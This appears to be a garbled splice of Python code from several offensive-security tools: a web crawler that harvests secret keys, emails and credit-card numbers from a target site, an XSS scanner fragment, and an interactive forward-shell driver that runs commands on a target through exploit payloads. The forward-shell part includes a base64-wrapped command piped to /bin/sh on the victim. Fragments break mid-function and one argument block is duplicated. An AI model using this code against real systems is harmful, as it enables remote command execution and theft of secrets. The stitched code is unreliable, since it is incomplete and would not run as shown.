help='update photon',
dest='update',
action='store_true')
parser.add_argument('--only-urls',
help='only extract URLs',
dest='only_urls',
action='store_true')
parser.add_argument('--wayback',
help='fetch URLs from archive.org as seeds',
dest='archive',
action='store_true')
args = parser.parse_args()
# If the user has supplied --update argument
if args.update:
updater()
quit()
# If the user has supplied a URL
if args.root:
main_inp = args.root
if main_inp.endswith('/'):
# We will remove it as it can cause problems later in the code
main_inp = main_inp[:-1]
# If the user hasn't supplied an URL
else:
print('\n' + parser.format_help().lower())
quit()
clone = args.clone
headers = args.headers # prompt for headers
def main():
print(BANNER)
args = cliOptions()
allPayloads = updater()
print()
while True:
url = input(colored('[>] Please enter target URL: ',
'magenta')).rstrip()
if url:
url = url.rstrip()
break
proxy = input(
colored('[>] Please enter proxy URL (optional): ', 'magenta'))
if proxy:
proxy = proxy.rstrip()
proxy = {proxy.split('://')[0]: proxy}
else:
proxy = {}
print('\n[?] Which payload you would like to use?\n')
for i, payloadName in enumerate(allPayloads):
print(f' {i + 1}. {payloadName}')
print()
while True:
payloadNum = input(
colored('[>] Please enter the number of your choice: ',
'magenta')).rstrip()
try:
payloadNum = int(payloadNum)
if payloadNum in range(1, len(allPayloads) + 1):
payloadName = allPayloads[payloadNum - 1]
payloadModule = import_module('payloads.' + payloadName)
break
except ValueError:
pass
print(
'\n[?] Would you like to run a single command or get a forward shell?\n'
)
print(' 1. Single command')
print(' 2. Forward shell\n')
while True:
choice = input(
colored('[>] Please enter the number of your choice: ',
'magenta')).rstrip()
if choice == '1':
cprint(
'\n############################### SINGLE CMD MODE ###############################\n',
'red')
cmd = input(
colored(
'[>] Please enter the command you would like to execute: ',
'magenta')).rstrip()
out = ForwardShell.runRawCmd(cmd, url, proxy, payloadName,
payloadModule.genPayload)
if out is not None:
print('\n' + out)
else:
cprint('[-] An error has occured', 'red')
break
elif choice == '2':
cprint(
'\n############################## FORWARD SHELL MODE #############################\n',
'red')
prompt = colored('FwdSh3ll> ', 'magenta')
sh = ForwardShell(url, proxy, payloadName,
payloadModule.genPayload, args.pipes_path)
print()
try:
while True:
cmd = input(prompt).strip()
if not cmd:
continue
elif cmd == 'pty':
prompt = ''
sh.upgradeToPty()
else:
sh.writeCmd(cmd)
except KeyboardInterrupt:
cprint('\n\n[*] Terminating shell, cleaning up the mess\n',
'green')
del sh
cmd = f'rm -f {args.pipes_path}/{INPUT}.* {args.pipes_path}/{OUTPUT}.*\n'
b64Cmd = b64encode(cmd.encode('utf-8')).decode('utf-8')
unwrapAndExec = f'echo {b64Cmd} | base64 -d | /bin/sh &> /dev/null'
ForwardShell.runRawCmd(unwrapAndExec, url, proxy, payloadName,
payloadModule.genPayload)
break
if args_file == 'default':
payloadList = core.config.payloads
else:
payloadList = list(filter(None, reader(args_file)))
seedList = []
if args_seeds:
seedList = list(filter(None, reader(args_seeds)))
encoding = base64 if encode and encode == 'base64' else False
if not proxy:
core.config.proxies = {}
if update: # if the user has supplied --update argument
updater()
quit() # quitting because files have been changed
if not target and not args_seeds: # if the user hasn't supplied a url
print('\n' + parser.format_help().lower())
quit()
if fuzz:
singleFuzz(target, paramData, verbose, encoding, headers, delay, timeout)
elif not recursive and not args_seeds:
if args_file:
bruteforcer(target, paramData, payloadList, verbose, encoding, headers, delay, timeout)
else:
scan(target, paramData, verbose, encoding, headers, delay, timeout, skipDOM, find, skip)
else:
if target:
def post(self, target, level_):
global keys
global files
global intel
global robots
global custom
global failed
global scripts
global external
global fuzzable
global endpoints
global processed
global internal
global main_url
global delay
global cook
global headers
global timeout
global host
global proxies
global user_agents
global only_urls
global bad_intel
global bad_scripts
global clone
global schema
global args
global supress_regex
global results
results = {}
# Disable SSL related warnings
warnings.filterwarnings('ignore')
# Processing command line arguments
parser = argparse.ArgumentParser()
# Options
parser.add_argument('-u', '--url', help='root url', dest='root')
parser.add_argument('-c', '--cookie', help='cookie', dest='cook')
parser.add_argument('-r',
'--regex',
help='regex pattern',
dest='regex')
parser.add_argument('-e',
'--export',
help='export format',
dest='export',
choices=['csv', 'json'])
parser.add_argument('-o',
'--output',
help='output directory',
dest='output')
parser.add_argument('-l',
'--level',
help='levels to crawl',
dest='level',
type=int)
parser.add_argument('-t',
'--threads',
help='number of threads',
dest='threads',
type=int)
parser.add_argument('-d',
'--delay',
help='delay between requests',
dest='delay',
type=float)
parser.add_argument('-v',
'--verbose',
help='verbose output',
dest='verbose',
action='store_true')
parser.add_argument('-s',
'--seeds',
help='additional seed URLs',
dest='seeds',
nargs="+",
default=[])
parser.add_argument('--stdout',
help='send variables to stdout',
dest='std')
parser.add_argument('--user-agent',
help='custom user agent(s)',
dest='user_agent')
parser.add_argument('--exclude',
help='exclude URLs matching this regex',
dest='exclude')
parser.add_argument('--timeout',
help='http request timeout',
dest='timeout',
type=float)
parser.add_argument('-p',
'--proxy',
help='Proxy server IP:PORT or DOMAIN:PORT',
dest='proxies',
type=proxy_type)
# Switches
parser.add_argument('--clone',
help='clone the website locally',
dest='clone',
action='store_true')
parser.add_argument('--headers',
help='add headers',
dest='headers',
action='store_true')
parser.add_argument('--dns',
help='enumerate subdomains and DNS data',
dest='dns',
action='store_true')
parser.add_argument('--keys',
help='find secret keys',
dest='api',
action='store_true')
parser.add_argument('--update',
help='update photon',
dest='update',
action='store_true')
parser.add_argument('--only-urls',
help='only extract URLs',
dest='only_urls',
action='store_true')
parser.add_argument('--wayback',
help='fetch URLs from archive.org as seeds',
dest='archive',
action='store_true')
args = parser.parse_args()
print("------------------------------------------------")
print(args.root)
print(type(args.level))
print(type(args.threads))
print(args.api)
print(args.archive)
print(args.export)
args.root = "http://" + target
args.level = int(level_)
args.threads = 30
args.api = True
args.archive = True
args.export = "json"
# If the user has supplied --update argument
if args.update:
updater()
quit()
# If the user has supplied a URL
if args.root:
main_inp = args.root
if main_inp.endswith('/'):
# We will remove it as it can cause problems later in the code
main_inp = main_inp[:-1]
# If the user hasn't supplied an URL
else:
print('\n' + parser.format_help().lower())
quit()
clone = args.clone
headers = args.headers # prompt for headers
verbose = args.verbose # verbose output
delay = args.delay or 0 # Delay between requests
timeout = args.timeout or 6 # HTTP request timeout
cook = args.cook or None # Cookie
api = bool(
args.api) # Extract high entropy strings i.e. API keys and stuff
proxies = []
if args.proxies:
print("%s Testing proxies, can take a while..." % info)
for proxy in args.proxies:
if is_good_proxy(proxy):
proxies.append(proxy)
else:
print("%s Proxy %s doesn't seem to work or timedout" %
(bad, proxy['http']))
print("%s Done" % info)
if not proxies:
print("%s no working proxies, quitting!" % bad)
exit()
else:
proxies.append(None)
crawl_level = args.level or 2 # Crawling level
thread_count = args.threads or 2 # Number of threads
only_urls = bool(args.only_urls) # Only URLs mode is off by default
# Variables we are gonna use later to store stuff
keys = set() # High entropy strings, prolly secret keys
files = set() # The pdf, css, png, etc files.
intel = set(
) # The email addresses, website accounts, AWS buckets etc.
robots = set() # The entries of robots.txt
custom = set() # Strings extracted by custom regex pattern
failed = set() # URLs that photon failed to crawl
scripts = set() # THe Javascript files
external = set(
) # URLs that don't belong to the target i.e. out-of-scope
# URLs that have get params in them e.g. example.com/page.php?id=2
fuzzable = set()
endpoints = set() # URLs found from javascript files
processed = set(['dummy']) # URLs that have been crawled
# URLs that belong to the target i.e. in-scope
internal = set(args.seeds)
everything = []
bad_scripts = set() # Unclean javascript file urls
bad_intel = set() # needed for intel filtering
core.config.verbose = verbose
if headers:
try:
prompt = prompt()
except FileNotFoundError as e:
print('Could not load headers prompt: {}'.format(e))
quit()
headers = extract_headers(prompt)
# If the user hasn't supplied the root URL with http(s), we will handle it
if main_inp.startswith('http'):
main_url = main_inp
else:
try:
requests.get('https://' + main_inp,
proxies=random.choice(proxies))
main_url = 'https://' + main_inp
except:
main_url = 'http://' + main_inp
schema = main_url.split('//')[0] # https: or http:?
# Adding the root URL to internal for crawling
internal.add(main_url)
# Extracts host out of the URL
host = urlparse(main_url).netloc
output_dir = args.output or host
output_dir = "results"
try:
domain = top_level(main_url)
except:
domain = host
if args.user_agent:
user_agents = args.user_agent.split(',')
else:
with open(sys.path[0] + '/core/user-agents.txt', 'r') as uas:
user_agents = [agent.strip('\n') for agent in uas]
supress_regex = False
# Records the time at which crawling started
then = time.time()
# Step 1. Extract urls from robots.txt & sitemap.xml
zap(main_url, args.archive, domain, host, internal, robots, proxies)
# This is so the level 1 emails are parsed as well
internal = set(remove_regex(internal, args.exclude))
# Step 2. Crawl recursively to the limit specified in "crawl_level"
for level in range(crawl_level):
# Links to crawl = (all links - already crawled links) - links not to crawl
links = remove_regex(internal - processed, args.exclude)
# If links to crawl are 0 i.e. all links have been crawled
if not links:
break
# if crawled links are somehow more than all links. Possible? ;/
elif len(internal) <= len(processed):
if len(internal) > 2 + len(args.seeds):
break
print('%s Level %i: %i URLs' % (run, level + 1, len(links)))
try:
flash(self.extractor, links, thread_count)
except KeyboardInterrupt:
print('')
break
if not only_urls:
for match in bad_scripts:
if match.startswith(main_url):
scripts.add(match)
elif match.startswith('/') and not match.startswith('//'):
scripts.add(main_url + match)
elif not match.startswith('http') and not match.startswith(
'//'):
scripts.add(main_url + '/' + match)
# Step 3. Scan the JavaScript files for endpoints
print('%s Crawling %i JavaScript files' % (run, len(scripts)))
flash(self.jscanner, scripts, thread_count)
for url in internal:
if '=' in url:
fuzzable.add(url)
for match, intel_name, url in bad_intel:
if isinstance(match, tuple):
for x in match: # Because "match" is a tuple
if x != '': # If the value isn't empty
if intel_name == "CREDIT_CARD":
if not luhn(match):
# garbage number
continue
intel.add("%s:%s" % (intel_name, x))
else:
if intel_name == "CREDIT_CARD":
if not luhn(match):
# garbage number
continue
intel.add("%s:%s:%s" % (url, intel_name, match))
for url in external:
try:
if top_level(url, fix_protocol=True) in INTELS:
intel.add(url)
except:
pass
# Records the time at which crawling stopped
now = time.time()
# Finds total time taken
diff = (now - then)
minutes, seconds, time_per_request = timer(diff, processed)
# Step 4. Save the results
if not os.path.exists(output_dir): # if the directory doesn't exist
os.mkdir(output_dir) # create a new directory
datasets = [
files, intel, robots, custom, failed, internal, scripts, external,
fuzzable, endpoints, keys
]
dataset_names = [
'files', 'intel', 'robots', 'custom', 'failed', 'internal',
'scripts', 'external', 'fuzzable', 'endpoints', 'keys'
]
writer(datasets, dataset_names, output_dir)
# Printing out results
print(('%s-%s' % (red, end)) * 50)
for dataset, dataset_name in zip(datasets, dataset_names):
if dataset:
print('%s %s: %s' %
(good, dataset_name.capitalize(), len(dataset)))
print(('%s-%s' % (red, end)) * 50)
print('%s Total requests made: %i' % (info, len(processed)))
print('%s Total time taken: %i minutes %i seconds' %
(info, minutes, seconds))
print('%s Requests per second: %i' %
(info, int(len(processed) / diff)))
datasets = {
'files': list(files),
'intel': list(intel),
'robots': list(robots),
'custom': list(custom),
'failed': list(failed),
'internal': list(internal),
'scripts': list(scripts),
'external': list(external),
'fuzzable': list(fuzzable),
'endpoints': list(endpoints),
'keys': list(keys)
}
if args.dns:
print('%s Enumerating subdomains' % run)
from plugins.find_subdomains import find_subdomains
subdomains = find_subdomains(domain)
print('%s %i subdomains found' % (info, len(subdomains)))
writer([subdomains], ['subdomains'], output_dir)
datasets['subdomains'] = subdomains
from plugins.dnsdumpster import dnsdumpster
print('%s Generating DNS map' % run)
dnsdumpster(domain, output_dir)
if args.export:
from plugins.exporter import exporter
# exporter(directory, format, datasets)
results = datasets
exporter(output_dir, args.export, datasets)
print('%s Results saved in %s%s%s directory' %
(good, green, output_dir, end))
if args.std:
for string in datasets[args.std]:
sys.stdout.write(string + '\n')
return results, 200
